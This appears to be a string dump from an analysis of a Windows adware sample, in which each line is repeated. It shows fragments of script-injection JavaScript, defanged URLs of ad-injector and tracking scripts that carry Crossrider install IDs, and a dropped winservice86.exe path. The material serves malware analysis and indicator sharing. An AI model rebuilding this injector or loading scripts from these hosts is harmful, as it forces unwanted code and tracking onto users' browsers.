    var tag = (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]);

    var tag = (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]);

    K.setAttribute('src', httpUrl);

    K.setAttribute('src', httpUrl);

    K.setAttribute('src', httpsUrl);

    K.setAttribute('src', httpsUrl);

    if (!httpsUrl || httpsUrl.length === 0) {

    if (!httpsUrl || httpsUrl.length === 0) {

    if ((typeof document.location.protocol === 'string') && (document.location.protocol.indexOf('https') === 0)) {

    if ((typeof document.location.protocol === 'string') && (document.location.protocol.indexOf('https') === 0)) {

    K.setAttribute('type', 'text/javascript');

    K.setAttribute('type', 'text/javascript');

    var K = document.createElement('script');

    var K = document.createElement('script');

    var httpsUrl = '__HTTPS_URL_PLACEHOLDER__';

    var httpsUrl = '__HTTPS_URL_PLACEHOLDER__';

    var httpUrl = '__HTTP_URL_PLACEHOLDER__';

    var httpUrl = '__HTTP_URL_PLACEHOLDER__';

    tag.appendChild(K);

    tag.appendChild(K);

    }, 500);

    }, 500);

    if (!document || !document.body || !tag){

    if (!document || !document.body || !tag){

    if (!document || !document.body){

    if (!document || !document.body){

    __HTTP_URL_PLACEHOLDER__

    __HTTP_URL_PLACEHOLDER__

    __HTTPS_URL_PLACEHOLDER__

    __HTTPS_URL_PLACEHOLDER__

    hXXps://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__

    hXXps://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__

    hXXp://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__

    hXXp://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__

    hXXps://i_crdrjs_info.tlscdn.com/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__

    hXXps://i_crdrjs_info.tlscdn.com/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__

    hXXp://i.crdrjs.info/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__

    hXXp://i.crdrjs.info/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__

    hXXp://cdn.visadd.com/script/14567725765/preload.js?subid=__CROSSRIDER_SUB_ID__

    hXXp://cdn.visadd.com/script/14567725765/preload.js?subid=__CROSSRIDER_SUB_ID__

    hXXps://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__

    hXXps://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__

    hXXp://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__

    hXXp://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__

    hXXps://asrv-a.akamaihd.net/sd/1700/1043.js

    hXXps://asrv-a.akamaihd.net/sd/1700/1043.js

    hXXp://asrv-a.akamaihd.net/sd/1700/1043.js

    hXXp://asrv-a.akamaihd.net/sd/1700/1043.js

    hXXps://asrv-a.akamaihd.net/sd/1700/1037.js

    hXXps://asrv-a.akamaihd.net/sd/1700/1037.js

    hXXp://asrv-a.akamaihd.net/sd/1700/1037.js

    hXXp://asrv-a.akamaihd.net/sd/1700/1037.js

    hXXps://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__

    hXXps://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__

    hXXp://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__

    hXXp://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__

    hXXps://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__

    hXXps://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__

    hXXp://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__

    hXXp://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__

    hXXps://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__

    hXXps://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__

    hXXp://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__

    hXXp://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__

    - CRT not initialized

    - CRT not initialized

    - Attempt to initialize the CRT more than once.

    - Attempt to initialize the CRT more than once.

    - floating point support not loaded

    - floating point support not loaded

    mscoree.dll

    mscoree.dll

    USER32.DLL

    USER32.DLL

    %Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe

    %Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe

    winservice86 exe

    winservice86 exe

    1000.1000.1000.1000

    1000.1000.1000.1000

    winservice86.exe

    winservice86.exe